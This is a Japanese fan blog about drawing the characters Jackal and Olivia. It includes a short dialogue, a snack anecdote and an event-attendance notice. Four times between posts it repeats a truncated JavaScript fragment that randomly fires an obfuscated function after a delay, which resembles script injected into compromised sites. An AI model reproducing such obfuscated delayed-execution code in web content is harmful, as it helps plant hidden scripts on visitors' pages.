andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

タイトルは「オリビアちゃんの真隣」という座席の取り合いに
負けたような気分を実感したアニエスみたいなイメージです。
こんなの描いときながら、オリビアはアニエスに呼ばれたら喜んでそっちを向くとは思うんですけれど(`・ω・´)笑

「まぁナダラケス遺跡でいいでしょ危険も少ないし」みたいな
浅くはないけど深くもないノリでジャッカル達に彼女を預けたんだろうけど、
まさか小説下巻の間ずっと一緒にいるくらい仲良くなるとは誰も思ってなかったんだろうなぁ。可愛い…

「ジャッカルさん。ほら、2周年ですよ。ピース」
「いや、俺の柄じゃねぇし…」
「ジャッカルさん?」
「へーへー。…ぴ、ぴーす」

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

改心する不良少年×優等生という組み合わせが元々大好きなんですが、
ジャカオリはそれだけじゃなくて騎士×姫みたいな関係性もあってたまらん。。
なんか「私の好きなもの全部詰め込んだらこうなるんだろうなぁ」っていうのが詰まり煮詰まった2人です。

andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

恋人未満の関係だと、ジャッカルは必要に駆られて彼女に触れることになっても必要最低限に留めてそう
(どさくさに紛れて必要以上に触っちゃおうグヘヘっていう下心がなさそう笑)
でもオリビアは躊躇なく抱きついたりしてそうだなぁ。。というイメージ
それでジャッカルに「ちょっと近い」って言われて照れつつもすごく気まずそうに言われて慌てて謝って、
で、そんなオリビアを見たジャッカルがまたドキドキしまくってたらいいな…

サクラ味のお菓子が好きなのですが、気がついたらサクラ味が1番発売される時期を逃していました。
この前買い物に行ったときにたまたまサクラ味のブッセを見つけてついで購入しましたが、
「実は今日が最終販売日で、しかも今買われた分で在庫終了なんですよ」とお店の方に言われて、
なんだか得をしたような気分になりました笑。
毎年楽しみにしていると言えば柚味も大好きなので、こっちはタイミング外さないようにしよう。。


andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

好きなキャラの笑顔を描くのはそれはもう大好きなんですが、
同じくらい泣き顔(悲し泣きでも嬉し泣きでも)と照れ顔を描くのが大好きです。
ジャッカルは照れ顔が過ぎるほど似合っているのでいつも描いちゃってますね笑。

泣き顔は「自分がこの表情を描いたらマジでそのキャラに惚れ込んでいる証拠」という判断基準になってます。
自分でもどうしてそんなに泣き顔が描きたいのか分かんないんですけど笑、描きたいなって思ってしまいます。
(泣くといっても極端に酷い目に遭わせるのはやっぱり嫌です。
 両片思い相手とのすれ違いや思い違いなどで泣くとか、幸せ故の涙とかが好きかな)

ただ、泣き顔に繋がるお話というのを考えるのが苦手なので漫画などにはしたことがないのです…_(:3」∠)_
HDDの中にはジャッカルとオリビアの泣き顔落描きが定期的に増えています笑。

5/4開催のSCCのWEBカタログに当方のサークルカットが掲載されていますが、
今回は欠席しますのでよろしくお願いします。

ブレイブリーでのイベント参加は今後控える形になると思います。(ジャカオリはまだまだ描くけど)
もし発行物の中にご入り用のものがあれば、ご面倒ですが通販をご利用ください。
プチオンリーなどジャンル的にお祭りになるようなイベントがあればまた参加するかも。